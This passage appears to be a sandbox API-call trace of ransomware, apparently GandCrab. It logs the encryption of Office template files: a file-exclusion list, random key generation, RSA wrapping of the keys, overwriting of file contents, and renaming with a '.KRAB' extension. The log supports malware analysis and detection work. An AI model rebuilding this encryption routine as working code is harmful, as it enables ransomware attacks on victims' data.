graphics\\1033\\tm03328975[[fn=theme picture accent]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328975[[fn=Theme Picture Accent]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328975[[fn=theme picture accent]].glox.krab")) returned 1 [0073.598] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.598] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.598] lstrcmpW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2=".") returned 1 [0073.598] lstrcmpW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="..") returned 1 [0073.598] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328983[[fn=Theme Picture Alternating Accent]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox" [0073.598] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.598] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox.KRAB") returned 163 [0073.599] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 158 [0073.599] lstrlenW (lpString=".glox") returned 5 [0073.599] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.599] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.599] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.600] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 158 [0073.600] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox") returned 158 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="desktop.ini") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="autorun.inf") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="ntuser.dat") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="iconcache.db") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="bootsect.bak") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="boot.ini") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="ntuser.dat.log") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="thumbs.db") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="ntldr") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="NTDETECT.COM") returned 1 [0073.600] lstrcmpiW (lpString1="TM03328983[[fn=Theme Picture Alternating Accent]].glox", lpString2="Bootfont.bin") returned 1 [0073.600] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.601] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.604] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.605] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.605] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.605] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.605] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.605] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.605] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.609] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.609] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.609] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.609] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.610] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.610] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.610] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.613] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023c78) returned 1 [0073.613] CryptGetKeyParam (in: hKey=0x1023c78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.613] CryptEncrypt (in: hKey=0x1023c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.614] GetLastError () returned 0x0 [0073.614] CryptDestroyKey (hKey=0x1023c78) returned 1 [0073.614] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.614] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1011ab8) returned 1 [0073.617] CryptImportKey (in: hProv=0x1011ab8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023db8) returned 1 [0073.618] CryptGetKeyParam (in: hKey=0x1023db8, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.618] CryptEncrypt (in: hKey=0x1023db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.618] GetLastError () returned 0x0 [0073.618] CryptDestroyKey (hKey=0x1023db8) returned 1 [0073.618] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.618] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328983[[fn=theme picture alternating accent]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.619] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.619] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.619] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x15fe, lpOverlapped=0x0) returned 1 [0073.677] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffea02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.677] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x15fe, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x15fe, lpOverlapped=0x0) returned 1 [0073.678] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.678] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.682] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.682] CloseHandle (hObject=0x484) returned 1 [0073.683] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.683] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328983[[fn=theme picture alternating accent]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328983[[fn=Theme Picture Alternating Accent]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328983[[fn=theme picture alternating accent]].glox.krab")) returned 1 [0073.684] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.685] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.685] lstrcmpW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2=".") returned 1 [0073.685] lstrcmpW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="..") returned 1 [0073.685] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328986[[fn=Theme Picture Grid]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox" [0073.685] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.688] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox.KRAB") returned 149 [0073.688] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 144 [0073.688] lstrlenW (lpString=".glox") returned 5 [0073.688] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.689] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.689] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.689] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 144 [0073.689] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox") returned 144 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="desktop.ini") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="autorun.inf") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="ntuser.dat") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="iconcache.db") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="bootsect.bak") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="boot.ini") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="ntuser.dat.log") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="thumbs.db") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.689] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.690] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="ntldr") returned 1 [0073.690] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="NTDETECT.COM") returned 1 [0073.690] lstrcmpiW (lpString1="TM03328986[[fn=Theme Picture Grid]].glox", lpString2="Bootfont.bin") returned 1 [0073.690] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.690] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1011ab8) returned 1 [0073.694] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.695] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.695] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.695] CryptGenRandom (in: hProv=0x1011ab8, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.695] CryptReleaseContext (hProv=0x1011ab8, dwFlags=0x0) returned 1 [0073.695] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.695] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.701] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.702] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.703] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.703] CryptGenRandom (in: hProv=0x1012558, dwLen=0x8, pbBuffer=0x338ddec | out: pbBuffer=0x338ddec) returned 1 [0073.703] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.703] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.703] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.706] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023878) returned 1 [0073.707] CryptGetKeyParam (in: hKey=0x1023878, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.707] CryptEncrypt (in: hKey=0x1023878, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30000*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.707] GetLastError () returned 0x0 [0073.707] CryptDestroyKey (hKey=0x1023878) returned 1 [0073.707] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.707] CryptAcquireContextW (in: phProv=0x338dd2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd2c*=0x1012558) returned 1 [0073.711] CryptImportKey (in: hProv=0x1012558, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338dd30 | out: phKey=0x338dd30*=0x1023c78) returned 1 [0073.711] CryptGetKeyParam (in: hKey=0x1023c78, dwParam=0x8, pbData=0x338dd24, pdwDataLen=0x338dd28, dwFlags=0x0 | out: pbData=0x338dd24*=0x800, pdwDataLen=0x338dd28*=0x4) returned 1 [0073.711] CryptEncrypt (in: hKey=0x1023c78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f30100*, pdwDataLen=0x338dd5c*=0x100) returned 1 [0073.711] GetLastError () returned 0x0 [0073.711] CryptDestroyKey (hKey=0x1023c78) returned 1 [0073.712] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.712] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328986[[fn=theme picture grid]].glox"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x484 [0073.712] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0073.713] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0073.713] ReadFile (in: hFile=0x484, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ddfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ddfc*=0x1831, lpOverlapped=0x0) returned 1 [0073.800] SetFilePointerEx (in: hFile=0x484, liDistanceToMove=0xffffe7cf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0073.800] WriteFile (in: hFile=0x484, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1831, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ddf8*=0x1831, lpOverlapped=0x0) returned 1 [0073.800] WriteFile (in: hFile=0x484, lpBuffer=0x2f30000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ddf8, lpOverlapped=0x0 | out: lpBuffer=0x2f30000*, lpNumberOfBytesWritten=0x338ddf8*=0x208, lpOverlapped=0x0) returned 1 [0073.800] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.804] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.804] CloseHandle (hObject=0x484) returned 1 [0073.805] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.806] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328986[[fn=theme picture grid]].glox"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328986[[fn=Theme Picture Grid]].glox.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\managed\\smartart graphics\\1033\\tm03328986[[fn=theme picture grid]].glox.krab")) returned 1 [0073.807] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.807] FindNextFileW (in: hFindFile=0x1023bf8, lpFindFileData=0x338de50 | out: lpFindFileData=0x338de50) returned 1 [0073.807] lstrcmpW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2=".") returned 1 [0073.807] lstrcmpW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="..") returned 1 [0073.807] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\", lpString2="TM03328990[[fn=Varying Width List]].glox" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox" [0073.807] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.807] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox.KRAB") returned 149 [0073.807] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 144 [0073.807] lstrlenW (lpString=".glox") returned 5 [0073.807] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.808] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".glox ") returned 6 [0073.808] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.808] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 144 [0073.808] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\Managed\\SmartArt Graphics\\1033\\TM03328990[[fn=Varying Width List]].glox") returned 144 [0073.808] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="desktop.ini") returned 1 [0073.808] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="autorun.inf") returned 1 [0073.808] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="ntuser.dat") returned 1 [0073.808] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="iconcache.db") returned 1 [0073.808] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="bootsect.bak") returned 1 [0073.808] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="boot.ini") returned 1 [0073.808] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="ntuser.dat.log") returned 1 [0073.808] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="thumbs.db") returned 1 [0073.809] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="KRAB-DECRYPT.html") returned 1 [0073.809] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="KRAB-DECRYPT.txt") returned 1 [0073.809] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="CRAB-DECRYPT.txt") returned 1 [0073.809] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="ntldr") returned 1 [0073.809] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="NTDETECT.COM") returned 1 [0073.809] lstrcmpiW (lpString1="TM03328990[[fn=Varying Width List]].glox", lpString2="Bootfont.bin") returned 1 [0073.809] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.809] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.813] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.813] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.814] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0073.814] CryptGenRandom (in: hProv=0x1012558, dwLen=0x20, pbBuffer=0x338ddcc | out: pbBuffer=0x338ddcc) returned 1 [0073.814] CryptReleaseContext (hProv=0x1012558, dwFlags=0x0) returned 1 [0073.814] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.814] CryptAcquireContextW (in: phProv=0x338dd34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338dd34*=0x1012558) returned 1 [0073.818] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0073.819] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0073.819] GetProcAddress (hModule=0x77990000, 